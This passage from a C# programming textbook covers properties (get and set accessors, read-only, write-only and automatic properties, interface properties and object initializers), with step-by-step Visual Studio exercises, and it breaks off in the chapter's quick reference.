4. In the GarbageCollectionDemo message box, click Close program.
Note Sometimes the message box displays the Debug option. If
this occurs, ignore it.
5. Verify that, after you close the message box, the message “Calculator
being disposed” appears in the console window following the report of the
unhandled exception.
6. In the console window, press the Enter key and return to Visual Studio
2017.
Summary
In this chapter, you saw how the garbage collector works and how the .NET
Framework uses it to dispose of objects and reclaim memory. You learned
how to write a destructor to clean up the resources used by an object when
memory is recycled by the garbage collector. You also saw how to use the
using statement to implement exception-safe disposal of resources and how
to implement the IDisposable interface to support this form of object
disposal.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 15, “Implementing properties to access
fields.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Write a destructor
Write a method whose name is the same as the
name of the class and is prefixed with a tilde (~).
The method must not have an access modifier
(such as public) and cannot have any parameters
or return a value. For example:
class Example
{
~Example()
{
...
}
}
Call a destructor
You can’t call a destructor. Only the garbage
collector can call a destructor.
Force garbage collection (not recommended)
Call GC.Collect.
Release a resource at a known point in time (but at the risk of resource leaks if an exception interrupts the execution)
Write a disposal method (a method that disposes
of a resource) and call it explicitly from the
program. For example:
class TextReader
{
...
public virtual void Close()
{
...
}
}
class Example
{
void Use()
{
TextReader reader = ...;
// use reader
reader.Close();
}
}
Support exception-safe disposal in a class
Implement the IDisposable interface. For
example:
class SafeResource : IDisposable
{
...
public void Dispose()
{
// Dispose resources here
}
}
Implement exception-safe disposal for an object that implements the IDisposable interface
Create the object in a using statement. For
example:
using (SafeResource resource = new SafeResource())
{
// Use SafeResource here
...
}
PART III
Defining extensible types with C#
Parts I and II introduced you to the core syntax of the C# language and
showed you how to build new types by using structures, enumerations, and
classes. You also saw how the common language runtime (CLR) manages the
memory used by variables and objects when a program runs, and you should
now understand the life cycle of C# objects. The chapters in Part III build on
this information, showing you how to use C# to create extensible components
—highly functional data types that you can reuse in many applications.
In Part III, you’ll learn about more advanced features of C#, such as
properties, indexers, generics, and collection classes. You’ll see how you can
build responsive systems by using events and how you can use delegates to
invoke the application logic of one class from another without closely
coupling the classes—a powerful technique that enables you to construct
highly extensible systems. You will also learn about Language-Integrated
Query (LINQ), which enables you to perform complex queries over
collections of objects in a clear and natural manner. And you’ll see how to
overload operators to customize the way in which common C# operators
function over your own classes and structures.
CHAPTER 15
Implementing properties to access fields
After completing this chapter, you will be able to:
Encapsulate logical fields by using properties.
Control read access to properties by declaring get accessors.
Control write access to properties by declaring set accessors.
Create interfaces that declare properties.
Implement interfaces containing properties by using structures and
classes.
Generate properties automatically based on field definitions.
Use properties to initialize objects.
This chapter looks at how to define and use properties to encapsulate fields
and data in a class. Previous chapters emphasize that you should make the
fields in a class private and provide methods to store values in them and to
retrieve their values. This approach ensures safe and controlled access to
fields, and you can use it to encapsulate additional logic and rules concerning
the values that are permitted. However, the syntax for accessing a field in this
way is unnatural. When you want to read or write a variable, you normally
use an assignment statement, so calling a method to achieve the same effect
on a field (which is, after all, just a variable) feels a little clumsy. Properties
are designed to alleviate this awkwardness.
Implementing encapsulation by using methods
First, let’s recap the original motivation for using methods to hide fields.
Consider the following structure that represents a position on a computer
screen as a pair of coordinates, x and y. Assume that the range of valid values
for the x-coordinate lies between 0 and 1279, and the range of valid values
for the y-coordinate lies between 0 and 1023.
struct ScreenPosition
{
public int X;
public int Y;
public ScreenPosition(int x, int y)
{
this.X = rangeCheckedX(x);
this.Y = rangeCheckedY(y);
}
private static int rangeCheckedX(int x)
{
if (x < 0 || x > 1279)
{
throw new ArgumentOutOfRangeException("X");
}
return x;
}
private static int rangeCheckedY(int y)
{
if (y < 0 || y > 1023)
{
throw new ArgumentOutOfRangeException("Y");
}
return y;
}
}
One problem with this structure is that it does not follow the golden rule
of encapsulation—that is, it does not keep its data private. Public data is often
a bad idea because the class cannot control the values that an application
specifies. For example, the ScreenPosition constructor checks its parameters
to ensure that they are in a specified range, but no such check can be done on
the “raw” access to the public fields. Sooner or later (probably sooner), an
error or misunderstanding on the part of a developer using this class in an
application can cause either X or Y to stray out of this range:
ScreenPosition origin = new ScreenPosition(0, 0);
...
int xpos = origin.X;
origin.Y = -100; // oops
The common way to solve this problem is to make the fields private and
add an accessor method and a modifier method to read and write the value of
each private field respectively. The modifier methods can then check the
range for new field values. For example, the code that follows contains an
accessor (GetX) and a modifier (SetX) for the X field. Notice that SetX checks
the parameter passed in.
struct ScreenPosition
{
...
public int GetX()
{
return this.x;
}
public void SetX(int newX)
{
this.x = rangeCheckedX(newX);
}
...
private static int rangeCheckedX(int x) { ... }
private static int rangeCheckedY(int y) { ... }
private int x, y;
}
The code now successfully enforces the range constraints, which is good.
However, there is a price to pay for this valuable guarantee—ScreenPosition
no longer has a natural field-like syntax; it uses awkward method-based
syntax instead. The example that follows increases the value of X by 10. To
do so, it has to read the value of X by using the GetX accessor method and
then write the value of X by using the SetX modifier method.
int xpos = origin.GetX();
origin.SetX(xpos + 10);
Compare this with the equivalent code if the X field were public:
origin.X += 10;
There is no doubt that, in this case, using public fields is syntactically
cleaner, shorter, and easier. Unfortunately, using public fields breaks
encapsulation. By using properties, you can combine the best of both worlds
(fields and methods) to retain encapsulation while providing a field-like
syntax.
What are properties?
A property is a cross between a field and a method—it looks like a field but
acts as a method. You access a property by using the same syntax that you
use to access a field. However, the compiler automatically translates this
field-like syntax into calls to accessor methods (sometimes referred to as
property getters and property setters).
The syntax for a property declaration looks like this:
AccessModifier Type PropertyName
{
get
{
// read accessor code
}
set
{
// write accessor code
}
}
A property can contain two blocks of code, starting with the get and set
keywords. The get block contains statements that execute when the property
is read, and the set block contains statements that run upon writing to the
property. The type of the property specifies the type of data read and written
by the get and set accessors.
The next code example shows the ScreenPosition structure rewritten by
using properties. When looking at this code, notice the following:
Lowercase _x and _y are private fields.
Uppercase X and Y are public properties.
All set accessors are passed the data to be written by using a hidden,
built-in parameter named value.
struct ScreenPosition
{
private int _x, _y;
public ScreenPosition(int X, int Y)
{
this._x = rangeCheckedX(X);
this._y = rangeCheckedY(Y);
}
public int X
{
get { return this._x; }
set { this._x = rangeCheckedX(value); }
}
public int Y
{
get { return this._y; }
set { this._y = rangeCheckedY(value); }
}
private static int rangeCheckedX(int x) { ... }
private static int rangeCheckedY(int y) { ... }
}
In this example, a private field directly implements each property, but this
is only one way to implement a property. All that is required is for a get
accessor to return a value of the specified type. Such a value can easily be
calculated dynamically rather than being simply retrieved from stored data, in
which case there would be no need for a physical field.
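For example, a sketch of a computed property (not part of the chapter's exercises) might expose the distance of a ScreenPosition from the origin, calculating the value from the _x and _y fields on every read with no backing field of its own:
struct ScreenPosition
{
    private int _x, _y;
    ...
    public double DistanceFromOrigin
    {
        // Computed on demand; no field stores this value.
        get { return Math.Sqrt((this._x * this._x) + (this._y * this._y)); }
    }
}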
Note Although the examples in this chapter show how to define
properties for a structure, they are equally applicable to classes; the
syntax is the same.
For simple properties, you can use expression-bodied members rather than
full-blown method syntax for get and set accessors. For example, you can
simplify the X and Y properties shown in the previous example like this:
public int X
{
get => this._x;
set => this._x = rangeCheckedX(value);
}
public int Y
{
get => this._y;
set => this._y = rangeCheckedY(value);
}
Notice that you don’t need to specify the return keyword for the get
accessor; you simply provide an expression that is evaluated every time the
property is read. This syntax is less verbose and arguably more natural,
although functionally the properties perform the same task. It is a matter of
personal preference which you should use, but for simple properties, I would
recommend adopting the expression-bodied syntax. Of course, you can mix
and match; you could implement a simple get accessor as an expression-
bodied member, but a more complex set accessor could still utilize the
method syntax.
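For example, the X property could mix the two styles like this (a sketch based on the ScreenPosition structure shown earlier):
public int X
{
    // Simple read logic suits the expression-bodied form.
    get => this._x;
    // More involved write logic can keep the full method syntax.
    set
    {
        this._x = rangeCheckedX(value);
    }
}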
Properties and field names: A warning
The section “Naming variables” in Chapter 2, “Working with variables,
operators, and expressions,” describes some recommendations for
naming variables. In particular, it states that you should avoid starting
an identifier with an underscore. However, you can see that the
ScreenPosition struct does not completely follow this guidance; it
contains fields named _x and _y. There is a good reason for this
anomaly. The sidebar “Naming and accessibility” in Chapter 7,
“Creating and managing classes and objects,” describes how it is
common to use identifiers that start with an uppercase letter for publicly
accessible methods and fields and to use identifiers that start with a
lowercase letter for private methods and fields. Taken together, these
two practices can cause you to give properties and private fields a name
that differs only in the case of the initial letter, and many organizations
do precisely this.
If your organization follows this approach, you should be aware of
one important drawback. Examine the following code, which
implements a class named Employee. The employeeID field is private,
but the EmployeeID property provides public access to this field.
class Employee
{
private int employeeID;
public int EmployeeID
{
get => this.EmployeeID;
set => this.EmployeeID = value;
}
}
This code will compile perfectly well, but it results in the program
raising a StackOverflowException whenever the EmployeeID property is
accessed. The exception occurs because the get and set
accessors reference the property (uppercase E) rather than the private
field (lowercase e), which causes an endless recursive loop that
eventually causes the process to exhaust the available memory. This
type of bug is very difficult to spot! For this reason, the examples in this
book name the private fields used to provide the data for properties with
a leading underscore; it makes them much easier to distinguish from the
names of properties. All other private fields will continue to use
camelCase identifiers without a leading underscore.
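For illustration, here is the same Employee class rewritten using the leading-underscore convention; the accessors now unambiguously reference the private field, so the endless recursion cannot occur:
class Employee
{
    private int _employeeID;
    public int EmployeeID
    {
        get => this._employeeID;          // the field, not the property
        set => this._employeeID = value;
    }
}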
Using properties
When you use a property in an expression, you can use it in a read context
(when you are retrieving its value) and in a write context (when you are
modifying its value). The following example shows how to read values from
the X and Y properties of the ScreenPosition structure:
ScreenPosition origin = new ScreenPosition(0, 0);
int xpos = origin.X; // calls origin.X.get
int ypos = origin.Y; // calls origin.Y.get
Notice that you access properties and fields by using identical syntax.
When you use a property in a read context, the compiler automatically
translates your field-like code into a call to the get accessor of that property.
Similarly, if you use a property in a write context, the compiler automatically
translates your field-like code into a call to the set accessor of that property.
origin.X = 40; // calls origin.X.set, with value set to 40
origin.Y = 100; // calls origin.Y.set, with value set to 100
The values being assigned are passed into the set accessors by using the
value variable, as described in the preceding section. The runtime does this
automatically.
It’s also possible to use a property in a read/write context. In this case,
both the get accessor and the set accessor are used. For example, the compiler
automatically translates statements such as the following into calls to the get
and set accessors:
origin.X += 10;
Tip You can declare static properties in the same way that you can
declare static fields and methods. You can access static properties by
using the name of the class or structure rather than an instance of the
class or structure.
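As a brief sketch of this (the ScreenMetrics class is hypothetical and not part of the chapter's exercises):
class ScreenMetrics
{
    private static int _width = 1280;
    public static int Width
    {
        get => _width;   // no 'this'; the data belongs to the class, not an instance
        set => _width = value;
    }
}
int width = ScreenMetrics.Width;   // accessed by using the class name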
Read-only properties
You can declare a property that contains only a get accessor. In this case, you
can use the property only in a read context. For example, here’s the X
property of the ScreenPosition structure declared as a read-only property:
struct ScreenPosition
{
private int _x;
...
public int X
{
get => this._x;
}
}
The X property does not contain a set accessor; therefore, any attempt to
use X in a write context will fail, as demonstrated in the following example:
origin.X = 140; // compile-time error
Write-only properties
Similarly, you can declare a property that contains only a set accessor. In this
case, you can use the property only in a write context. For example, here’s
the X property of the ScreenPosition structure declared as a write-only
property:
struct ScreenPosition
{
private int _x;
...
public int X
{
set => this._x = rangeCheckedX(value);
}
}
The X property does not contain a get accessor; any attempt to use X in a
read context will fail, as illustrated here:
Console.WriteLine(origin.X); // compile-time error
origin.X = 200; // compiles OK
origin.X += 10; // compile-time error
Note Write-only properties are useful for secure data such as
passwords. Ideally, an application that implements security should
allow you to set your password but never allow you to read it back.
When a user attempts to log on, the user can provide the password. The
logon method can compare this password with the stored password and
return only an indication of whether they match.
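A minimal sketch of this idea follows; the User class, its hashing helper, and the CheckPassword method are hypothetical and serve only to show a write-only property in use:
class User
{
    private string _passwordHash;
    public string Password
    {
        // No get accessor: the password can be set but never read back.
        set => this._passwordHash = computeHash(value);
    }
    public bool CheckPassword(string attempt) =>
        this._passwordHash == computeHash(attempt);
    private static string computeHash(string text)
    {
        // A real application would use a salted cryptographic hash.
        return text.GetHashCode().ToString();
    }
}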
Property accessibility
You can specify the accessibility of a property (using the keywords public,
private, or protected) when you declare it. However, it is possible within the
property declaration to override the property accessibility for the get and set
accessors. For example, the version of the ScreenPosition structure shown in
the code that follows defines the set accessors of the X and Y properties as
private. (The get accessors are public because the properties are public.)
struct ScreenPosition
{
private int _x, _y;
...
public int X
{
get => this._x;
private set => this._x = rangeCheckedX(value);
}
public int Y
{
get => this._y;
private set => this._y = rangeCheckedY(value);
}
...
}
You must observe some rules when defining accessors that have different
accessibility from one another:
You can change the accessibility of only one of the accessors when you
define it. It wouldn’t make much sense to define a property as public
only to change the accessibility of both accessors to private anyway.
The modifier must not specify an accessibility that is less restrictive
than that of the property. For example, if the property is declared to be
private, you cannot specify the read accessor as public. (Instead, you
would make the property public and make the write accessor private.)
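To make these rules concrete, here is a hedged sketch; the first property compiles because its accessor is more restrictive than the property, whereas the second does not because its accessor attempts to be less restrictive:
class Example
{
    private int _value;
    public int Value1
    {
        get => this._value;
        private set => this._value = value;   // OK: private is more restrictive than public
    }
    private int Value2
    {
        public get => this._value;            // compile-time error: accessor cannot be
                                              // less restrictive than the property
        set => this._value = value;
    }
}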
Understanding the property restrictions
Properties look, act, and feel like fields when you read or write data by using
them. However, they are not true fields, and certain restrictions apply to
them:
You can assign a value through a property of a structure or class only
after the structure or class has been initialized. The following code
example is illegal because the location variable has not been initialized
(by using new):
ScreenPosition location;
location.X = 40; // compile-time error, location not assigned
Note This might seem trivial, but if X were a field rather than a
property, the code would be legal. For this reason, you should define
structures and classes from the beginning by using properties rather than
fields that you later migrate to properties. Code that uses your classes
and structures might no longer work after you change fields into
properties. You will return to this matter in the section “Generating
automatic properties” later in this chapter.
You can’t use a property as a ref or an out argument to a method
(although you can use a writable field as a ref or an out argument; a
common workaround is sketched after this list). This
makes sense because the property doesn’t really point to a memory
location; rather, it points to an accessor method, such as in the
following example:
MyMethod(ref location.X); // compile-time error
A property can contain at most one get accessor and one set accessor.
A property cannot contain other methods, fields, or properties.
The get and set accessors cannot take any parameters. The data being
assigned is passed to the set accessor automatically by using the value
variable.
You can’t declare properties by using const, such as is demonstrated
here:
const int X
{
get => ...
set => ...
} // compile-time error
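As noted above, a property cannot be passed as a ref or out argument. A common workaround, sketched here, is to copy the property into a local variable, pass the variable by reference, and then write the result back through the property:
int x = location.X;   // read via the get accessor
MyMethod(ref x);      // a local variable has a real memory location
location.X = x;       // write the result back via the set accessor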
Using properties appropriately
Properties are a powerful feature and used correctly, they can help to
make code easier to understand and maintain. However, they are no
substitute for careful object-oriented design that focuses on the behavior
of objects rather than on the properties of objects. Accessing private
fields through regular methods or through properties does not, by itself,
make your code well designed. For example, a bank account holds a
balance indicating the funds available in the account. You might,
therefore, be tempted to create a Balance property on a BankAccount
class, like this:
class BankAccount
{
private decimal _balance;
...
public decimal Balance
{
get => this._balance;
set => this._balance = value;
}
}
This is a poor design because it fails to represent the functionality
required when someone withdraws money from or deposits money into
an account. (If you know of a bank that allows you to change the
balance of your account directly without physically putting money into
the account, please let me know!) When you’re programming, try to
express the problem you’re solving in the solution and don’t get lost in
a mass of low-level syntax. As the following example illustrates,
provide Deposit and Withdraw methods for the BankAccount class
rather than a property setter:
class BankAccount
{
private decimal _balance;
...
public decimal Balance { get => this._balance; }
public void Deposit(decimal amount) { ... }
public bool Withdraw(decimal amount) { ... }
}
Declaring interface properties
You encountered interfaces in Chapter 13, “Creating interfaces and defining
abstract classes.” Interfaces can define properties as well as methods. To do
this, you specify the get or set keyword or both, but you replace the body of
the get or set accessor with a semicolon, as shown here:
interface IScreenPosition
{
int X { get; set; }
int Y { get; set; }
}
Any class or structure that implements this interface must implement the X
and Y properties with get and set accessor methods (or expression-bodied
members).
struct ScreenPosition : IScreenPosition
{
...
public int X
{
get { ... } // or get => ...
set { ... } // or set => ...
}
public int Y
{
get { ... }
set { ... }
}
...
}
If you implement the interface properties in a class, you can declare the
property implementations as virtual, which enables derived classes to
override the implementations.
class ScreenPosition : IScreenPosition
{
...
public virtual int X
{
get { ... }
set { ... }
}
public virtual int Y
{
get { ... }
set { ... }
}
...
}
Note This example shows a class. Remember that the virtual keyword is
not valid when creating a struct because structures do not support
inheritance.
You can also choose to implement a property by using the explicit
interface implementation syntax covered in Chapter 13. An explicit
implementation of a property is nonpublic and nonvirtual (and cannot be
overridden).
struct ScreenPosition : IScreenPosition
{
...
int IScreenPosition.X
{
get { ... }
set { ... }
}
int IScreenPosition.Y
{
get { ... }
set { ... }
}
...
}
Replacing methods with properties
Chapter 13 teaches you how to create a drawing application with which a
user can place circles and squares on a canvas in a window. In the exercises
in that chapter, you factor the common functionality for the Circle and
Square classes into an abstract class called DrawingShape. The
DrawingShape class provides the SetLocation and SetColor methods, which
the application uses to specify the position and color of a shape on the screen.
In the following exercise, you will modify the DrawingShape class to expose
the location and color of a shape as properties.
Use properties
1. Start Visual Studio 2017 if it is not already running.
2. Open the Drawing solution, which is located in the \Microsoft
Press\VCSBS\Chapter 15\Drawing Using Properties folder in your
Documents folder.
3. Display the DrawingShape.cs file in the Code and Text Editor window.
This file contains the same DrawingShape class that is in Chapter 13
except that, following the recommendations described earlier in this
chapter, the size field has been renamed as _size, and the locX and locY
fields have been renamed as _x and _y.
abstract class DrawingShape
{
protected int _size;
protected int _x = 0, _y = 0;
...
}
4. Open the IDraw.cs file for the Drawing project in the Code and Text
Editor window.
This interface specifies the SetLocation method, like this:
interface IDraw
{
void SetLocation(int xCoord, int yCoord);
...
}
The purpose of this method is to set the _x and _y fields of the
DrawingShape object to the values passed in. This method can be
replaced with a pair of properties.
5. Delete this method and replace it with the definition of a pair of
properties named X and Y, as shown here in bold:
interface IDraw
{
int X { get; set; }
int Y { get; set; }
...
}
6. In the DrawingShape class, delete the SetLocation method and replace it
with the following implementations of the X and Y properties:
public int X
{
get => this._x;
set => this._x = value;
}
public int Y
{
get => this._y;
set => this._y = value;
}
7. Display the DrawingPad.xaml.cs file in the Code and Text Editor
window and locate the drawingCanvas_Tapped method.
This method runs when a user taps the screen or clicks the left mouse
button. It draws a square on the screen at the point where the user taps or
clicks.
8. Locate the statement that calls the SetLocation method to set the position
of the square on the screen. It is located in the if statement block as
highlighted in the following:
if (mySquare is IDraw)
{
IDraw drawSquare = mySquare;
drawSquare.SetLocation((int)mouseLocation.X, (int)mouseLocation.Y);
drawSquare.Draw(drawingCanvas);
}
9. Replace this statement with code that sets the X and Y properties of the
Square object, as shown in bold in the following code:
if (mySquare is IDraw)
{
IDraw drawSquare = mySquare;
drawSquare.X = (int)mouseLocation.X;
drawSquare.Y = (int)mouseLocation.Y;
drawSquare.Draw(drawingCanvas);
}
10. Locate the drawingCanvas_RightTapped method.
This method runs when the user taps and holds a finger on the screen or
clicks the right mouse button. It draws a circle at the location where the
user taps and holds or right-clicks.
11. In this method, replace the statement that calls the SetLocation method
of the Circle object and set the X and Y properties instead, as shown in
bold in the following example:
if (myCircle is IDraw)
{
IDraw drawCircle = myCircle;
drawCircle.X = (int)mouseLocation.X;
drawCircle.Y = (int)mouseLocation.Y;
drawCircle.Draw(drawingCanvas);
}
12. Open the IColor.cs file for the Drawing project in the Code and Text
Editor window. This interface specifies the SetColor method, like this:
interface IColor
{
void SetColor(Color color);
}
13. Delete this method and replace it with the definition of a property named
Color, as presented here:
interface IColor
{
Color Color { set; }
}
This is a write-only property, providing a set accessor but no get
accessor. You define the property this way because the color is not
stored in the DrawingShape class and is specified only as each shape is
drawn; you cannot actually query a shape to find out which color it is.
Note It is common practice for a property to share the same name
as a type (Color in this example).
14. Return to the DrawingShape class in the Code and Text Editor window.
Replace the SetColor method in this class with the Color property
shown here:
public Color Color
{
set
{
if (this.shape != null)
{
SolidColorBrush brush = new SolidColorBrush(value);
this.shape.Fill = brush;
}
}
}
Note The code for the set accessor is almost the same as the
original SetColor method except that the statement that creates the
SolidColorBrush object is passed the value parameter.
Additionally, this is an example where the method syntax is more
appropriate than using an expression-bodied member.
15. Return to the DrawingPad.xaml.cs file in the Code and Text Editor
window. In the drawingCanvas_ Tapped method, modify the statement
that sets the color of the Square object to match the following code in
bold:
if (mySquare is IColor)
{
IColor colorSquare = mySquare;
colorSquare.Color = Colors.BlueViolet;
}
16. Similarly, in the drawingCanvas_RightTapped method, modify the
statement that sets the color of the Circle object as shown in bold.
if (myCircle is IColor)
{
IColor colorCircle = myCircle;
colorCircle.Color = Colors.HotPink;
}
17. On the Debug menu, click Start Debugging to build and run the project.
18. Verify that the application operates in the same manner as before. If you
tap the screen or click the left mouse button on the canvas, the
application should draw a square, and if you tap and hold or click the
right mouse button, the application should draw a circle.
19. Return to the Visual Studio 2017 programming environment and stop
debugging.
Generating automatic properties
As mentioned earlier in this chapter, the principal purpose of properties is to
hide the implementation of fields from the outside world. This is fine if your
properties actually perform some useful work, but if the get and set accessors
simply wrap operations that just read or assign a value to a field, you might
be questioning the value of this approach. However, there are at least two
good reasons why you should define properties rather than expose data as
public fields even in these situations:
Compatibility with applications Fields and properties expose
themselves by using different metadata in assemblies. If you develop a
class and decide to use public fields, any applications that use this class
will reference these items as fields. Although you use the same C#
syntax for reading and writing a field that you use when reading and
writing a property, the compiled code is actually quite different—the
C# compiler just hides the differences from you. If you later decide that
you really do need to change these fields to properties (maybe the
business requirements have changed, and you need to perform
additional logic when assigning values), existing applications will not
be able to use the updated version of the class without being
recompiled. This is awkward if you have deployed the application on a
large number of devices throughout an organization. There are ways
around this, but it is generally better to avoid getting into this situation
in the first place.
Compatibility with interfaces If you are implementing an interface
and the interface defines an item as a property, you must write a
property that matches the specification in the interface, even if the
property just reads and writes data in a private field. You cannot
implement a property simply by exposing a public field with the same
name.
The designers of the C# language recognized that programmers are busy
people who should not have to waste their time writing more code than they
need to. To this end, the C# compiler can generate the code for properties
automatically, like this:
class Circle
{
public int Radius { get; set; }
...
}
In this example, the Circle class contains a property named Radius. Apart
from the type of this property, you have not specified how this property
works—the get and set accessors are empty. The C# compiler converts this
definition to a private field and a default implementation that looks similar to
this:
class Circle
{
private int _radius;
public int Radius
{
get
{
return this._radius;
}
set
{
this._radius = value;
}
}
...
}
So with very little effort, you can implement a simple property by using
automatically generated code, and if you need to include additional logic
later, you can do so without breaking any existing applications.
Note The syntax for defining an automatic property is almost identical
to the syntax for defining a property in an interface. The exception is
that an automatic property can specify an access modifier such as
private, public, or protected.
You can create a read-only automatic property by omitting the empty set
accessor from your property declaration, like this:
class Circle
{
public DateTime CircleCreatedDate { get; }
...
}
This is useful in scenarios where you want to create an immutable
property; a property that is set when the object is constructed and cannot
subsequently be changed. For example, you might want to set the date on
which an object was created or the name of the user who created it, or you
might want to generate a unique identifier value for the object. These are
values that you typically want to set once and then prevent them from being
modified. With this in mind, C# allows you to initialize read-only automatic
properties in one of two ways. You can initialize the property from a
constructor, like this:
class Circle
{
public Circle()
{
CircleCreatedDate = DateTime.Now;
}
public DateTime CircleCreatedDate { get; }
...
}
Alternatively, you can initialize the property as part of the declaration, like
this:
class Circle
{
public DateTime CircleCreatedDate { get; } = DateTime.Now;
...
}
Be aware that if you initialize a property in this way and also set its value
in a constructor, the value provided by the constructor will overwrite the
value specified by the property initializer; use one approach or the other, but
not both!
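The sequencing is easy to demonstrate with a sketch (the DateTime-valued constructor parameter is hypothetical): the initializer runs first, and the constructor then overwrites its value, so every new Circle reports the date supplied to the constructor:
class Circle
{
    // The initializer runs first...
    public DateTime CircleCreatedDate { get; } = DateTime.Now;
    public Circle(DateTime created)
    {
        // ...and the constructor then overwrites that value.
        CircleCreatedDate = created;
    }
}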
Note You cannot create write-only automatic properties. If you attempt
to create an automatic property without a get accessor, you will see a
compile-time error.
Initializing objects by using properties
In Chapter 7, you learned how to define constructors to initialize an object.
An object can have multiple constructors, and you can define constructors
with varying parameters to initialize different elements in an object. For
example, you could define a class that models a triangle, like this:
public class Triangle
{
private int side1Length;
private int side2Length;
private int side3Length;
// default constructor - default values for all sides
public Triangle()
{
this.side1Length = this.side2Length = this.side3Length = 10;
}
// specify length for side1Length, default values for the others
public Triangle(int length1)
{
this.side1Length = length1;
this.side2Length = this.side3Length = 10;
}
// specify length for side1Length and side2Length,
// default value for side3Length
public Triangle(int length1, int length2)
{
this.side1Length = length1;
this.side2Length = length2;
this.side3Length = 10;
}
// specify length for all sides
public Triangle(int length1, int length2, int length3)
{
this.side1Length = length1;
this.side2Length = length2;
this.side3Length = length3;
}
}
Depending on how many fields a class contains and the various
combinations you want to enable for initializing the fields, you could end up
writing a lot of constructors. There are also potential problems if many of the
fields have the same type: you might not be able to write a unique constructor
for all combinations of fields. For example, in the preceding Triangle class,
you could not easily add a constructor that initializes only the side1Length
and side3Length fields because it would not have a unique signature; it would
take two int parameters, and the constructor that initializes side1Length and
side2Length already has this signature. One possible solution is to define a
constructor that takes optional parameters and specify values for the
parameters as named arguments when you create a Triangle object. However,
a better and more transparent solution is to initialize the private fields to a set
of default values and expose them as properties, like this:
public class Triangle
{
private int side1Length = 10;
private int side2Length = 10;
private int side3Length = 10;
public int Side1Length
{
set => this.side1Length = value;
}
public int Side2Length
{
set => this.side2Length = value;
}
public int Side3Length
{
set => this.side3Length = value;
}
}
When you create an instance of a class, you can initialize it by specifying
the names and values for any public properties that have set accessors. For
example, you can create Triangle objects and initialize any combination of
the three sides, like this:
Triangle tri1 = new Triangle { Side3Length = 15 };
Triangle tri2 = new Triangle { Side1Length = 15, Side3Length = 20 };
Triangle tri3 = new Triangle { Side2Length = 12, Side3Length = 17 };
Triangle tri4 = new Triangle { Side1Length = 9, Side2Length = 12, Side3Length = 15 };
This syntax is known as an object initializer. When you invoke an object
initializer in this way, the C# compiler generates code that calls the default
constructor and then calls the set accessor of each named property to initialize
it with the value specified. You can specify object initializers in combination
with non-default constructors as well. For example, if the Triangle class also
provided a constructor that took a single string parameter describing the type
of triangle, you could invoke this constructor and initialize the other
properties, like this:
Triangle tri5 = new Triangle("Equilateral triangle")
{
Side1Length = 3,
Side2Length = 3,
Side3Length = 3
};
The important point to remember is that the constructor runs first and the
properties are set afterward. Understanding this sequencing is important if the
constructor sets fields in an object to specific values and the properties that
you specify change these values.
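A short sketch using the Triangle class makes the sequencing visible:
Triangle tri = new Triangle { Side1Length = 15 };
// 1. The default constructor runs; side1Length starts at its default value of 10.
// 2. The Side1Length set accessor then runs and changes the value to 15.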
You can also use object initializers with automatic properties that are not
read-only, as you will see in the next exercise. In this exercise, you will
define a class for modeling regular polygons that contains automatic
properties for providing access to information about the number of sides the
polygon contains and the length of these sides.
Note You cannot initialize automatic read-only properties in this way;
you have to use one of the techniques described in the previous section.
Define automatic properties and use object initializers
1. In Visual Studio 2017, open the AutomaticProperties solution, which is
located in the \Microsoft Press\VCSBS\Chapter 15\AutomaticProperties
folder in your Documents folder.
The AutomaticProperties project contains the Program.cs file, defining
the Program class with the Main and doWork methods that you have
seen in previous exercises.
2. In Solution Explorer, right-click the AutomaticProperties project, point
to Add, and then click Class to open the Add New Item –
AutomaticProperties dialog box. In the Name box, type Polygon.cs, and
then click Add.
The Polygon.cs file, holding the Polygon class, is created and added to
the project and appears in the Code and Text Editor window.
3. Add the automatic properties NumSides and SideLength to the Polygon
class, as shown here in bold:
class Polygon
{
public int NumSides { get; set; }
public double SideLength { get; set; }
}
4. Add the following default constructor shown in bold to the Polygon
class:
class Polygon
{
...
public Polygon()
{
this.NumSides = 4;
this.SideLength = 10.0;
}
}
This constructor initializes the NumSides and SideLength fields with
default values. In this exercise, the default polygon is a square with sides
10 units long.
5. Display the Program.cs file in the Code and Text Editor window.
6. Add the statements shown here in bold to the doWork method, replacing
the // TODO: comment:
static void doWork()
{
Polygon square = new Polygon();
Polygon triangle = new Polygon { NumSides = 3 };
Polygon pentagon = new Polygon { SideLength = 15.5, NumSides = 5 };
}
These statements create Polygon objects. The square variable is
initialized by using the default constructor. The triangle and pentagon
variables are also initialized by using the default constructor, and then
this code changes the value of the properties exposed by the Polygon
class. In the case of the triangle variable, the NumSides property is set to
3, but the SideLength property is left at its default value of 10.0. For the
pentagon variable, the code changes the values of the SideLength and
NumSides properties.
7. Add to the end of the doWork method the following code shown in bold:
static void doWork()
{
...
Console.WriteLine($"Square: number of sides is {square.NumSides}, length of each side is {square.SideLength}");
Console.WriteLine($"Triangle: number of sides is {triangle.NumSides}, length of each side is {triangle.SideLength}");
Console.WriteLine($"Pentagon: number of sides is {pentagon.NumSides}, length of each side is {pentagon.SideLength}");
}
These statements display the values of the NumSides and SideLength
properties for each Polygon object.
8. On the Debug menu, click Start Without Debugging.
Verify that the program builds and runs, writing messages to the console
window that report the number of sides and side length for the square,
triangle, and pentagon.
9. Press the Enter key to close the application and return to Visual Studio
2017.
Summary
In this chapter, you saw how to create and use properties to provide
controlled access to data in an object. You also saw how to create automatic
properties and how to use properties when initializing objects.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 16, “Handling binary data and using
indexers.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Declare a read/write property for a structure or class
Declare the type of the property, its name, a get accessor, and a set accessor. For example:
struct ScreenPosition
{
...
public int X
{
get { ... } // or get => ...
set { ... } // or set => ...
}
...
}
Declare a read-only property for a structure or class
Declare a property with only a get accessor. For example:
struct ScreenPosition
{
...
public int X
{
get { ... } // or get => ...
}
...
}
Declare a write-only property for a structure or class
Declare a property with only a set accessor. For example:
struct ScreenPosition
{
...
public int X
{
set { ... } // or set => ...
}
...
}
Declare a property in an interface
Declare a property with just the get or set keyword or both. For example:
interface IScreenPosition
{
int X { get; set; } // no body
int Y { get; set; } // no body
}
Implement an interface property in a structure or class
In the class or structure that implements the interface, declare the property and implement the accessors. For example:
struct ScreenPosition : IScreenPosition
{
public int X
{
get { ... }
set { ... }
}
public int Y
{
get { ... }
set { ... }
}
}
Create an automatic property
In the class or structure that contains the property, define the property with empty get and set accessors. For example:
class Polygon
{
